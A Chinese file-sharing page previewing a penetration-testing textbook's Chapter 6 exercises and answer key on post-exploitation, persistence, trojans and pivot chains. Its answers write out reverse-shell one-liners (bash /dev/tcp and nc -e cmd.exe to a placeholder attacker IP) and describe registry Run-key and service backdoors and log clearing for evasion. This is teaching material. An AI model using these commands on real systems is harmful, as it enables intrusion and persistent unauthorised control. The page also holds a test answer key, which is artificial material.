渗透测试技术-第六章习题及参考答案_第1页
渗透测试技术-第六章习题及参考答案_第2页
渗透测试技术-第六章习题及参考答案_第3页
全文预览已结束

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

第六章习题一、单项选择题1.在进行后渗透测试时,以下哪种操作不能帮助攻击者维持对目标系统的持久性控制?()A.创建绑定Shell或反弹Shell B.创建调度任务C.执行ARP扫描 D.创建新用户2.以下哪种情况不适用于使用反弹Shell?()A.目标机器因防火墙受限,只能发送请求,不能接收请求B.目标机器端口被占用C.目标机器处于公共网络,IP地址固定,攻击机器可以直接连接D.对于病毒、木马,受害者何时能“中招”、对方的网络环境是什么样的、什么时候开关机等情况都是未知的3.关于权限维持的描述,以下哪项是不正确的?()A.权限维持是指攻击者在成功入侵系统后,为了保持对该系统的持久访问能力,使用各种技术和工具,绕过系统的安全机制B.Windows的辅助功能镜像劫持是通过使用Windows内置的调试功能IFEO(ImageFileExecutionOptions)来实现的C.在Windows权限维持中,启动项/服务后门和系统计划任务后门都需要攻击者获取系统管理员权限才能创建D.在Linux权限维持中,Crontab计划任务后门是通过修改系统的/etc/crontab文件实现的4.以下哪种类型的木马会模拟用户点击广告等行为来获取高额的广告推广费用?()A.网游木马 B.网银木马 C.下载类木马 D.网页点击类木马5.根据本章内容,下列叙述中错误的是()。A.在网络攻击后,攻击者通常需要清除日志和操作记录,以隐藏其入侵痕迹B.攻击者常用的隐匿方式之一是“肉鸡”和代理服务器混合组成的跳板链C.Socks5代理服务器仅能响应HTTP通信协议,并过滤除80、8080等Web常用端口外的其他端口访问请求D.Tor是许多攻击者用来隐藏自己的工具二、简答题1.请详细解释什么是后渗透,包括其目的、方法和在渗透测试中的重要性。说明在进行后渗透测试时,如何有效地隐藏攻击行为,避免被系统管理员和安全设备检测到。2.请详细解释反弹Shell的工作原理,以及在Linux和Windows系统下如何使用反弹Shell。3.简述Windows权限维持中启动项/服务后门的创建过程。4.请简述木马的两个主要部分,并说明这两部分是如何协同工作的。5.请简述网络攻击者是如何利用跳板来隐藏自己的行踪的。参考答案一、单项选择题C.执行ARP扫描不能帮助攻击者维持对目标系统的持久性控制。C.目标机器处于公共网络,IP地址固定,攻击机器可以直接连接的情况下,不适合使用反弹Shell。C.在Windows权限维持中,启动项/服务后门和系统计划任务后门不一定需要系统管理员权限才能创建。D.网页点击类木马会模拟用户点击广告行为来获取广告推广费用。C.Socks5代理服务器不仅能响应HTTP协议,还可以处理其他协议,不会过滤除80、8080等Web常用端口外的其他端口访问请求。二、简答题1.后渗透定义与目的:后渗透是指在成功入侵目标系统后,攻击者进行进一步操作的阶段,包括权限提升、信息收集、持久性控制等,目的是扩展控制、获取更多敏感信息。方法:创建后门、调度任务、收集密码等操作;使用凭证窃取、横向移动等手段访问更多系统资源。重要性:后渗透能够进一步加深攻击效果,同时确保攻击者可以长期控制目标系统,实现持久性。隐藏攻击行为:隐藏文件、日志清除、使用代理或跳板、加密通信、伪装为合法进程或服务,绕过IDS/IPS等安全检测工具,减少痕迹暴露。2.反弹Shell的工作原理原理:反弹Shell是指目标主机主动连接攻击者的控制端,将其Shell或命令行环境反弹到控制端,适用于目标主机无法接受外部连接的情况。在Linux系统中使用:通常通过bash-i>&/dev/tcp/攻击者IP/端口0>&1实现,目标主机的Shell会连接攻击者监听的端口。在Windows系统中使用:可利用nc.exe实现,命令如nc-ecmd.exe攻击者IP端口,使得Windows目标的cmd环境反弹到攻击者控制端。3.Windows权限维持中启动项/服务后门的创建过程创建启动项后门:在注册表的HKCU\Software\Microsoft\Windows\CurrentVersion\Run或HKLM\Software\Microsoft\Windows\CurrentVersion\Run中添加恶意程序路径,使得系统启动时自动执行。创建服务后门:使用sccreate命令创建一个新的服务,将恶意程序作为服务添加到系统,服务启动时即可执行恶意代码。4.木马的主要部分控制端:攻击者端,用于发送指令、控制木马操作。受控端(客户端):受害者系统中的木马组件,负责接收控制端的指令,执行相应操作。协同工作方式:控制端通过网络发送指令,受控端接收并执行,如收集数据、远程控制。两者通常通过加密连接保持隐蔽通信,避免被检测。5.利用跳板隐藏行踪跳板定义:攻击者通过多个中间代理(跳板)进行攻击,每个跳板都是

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论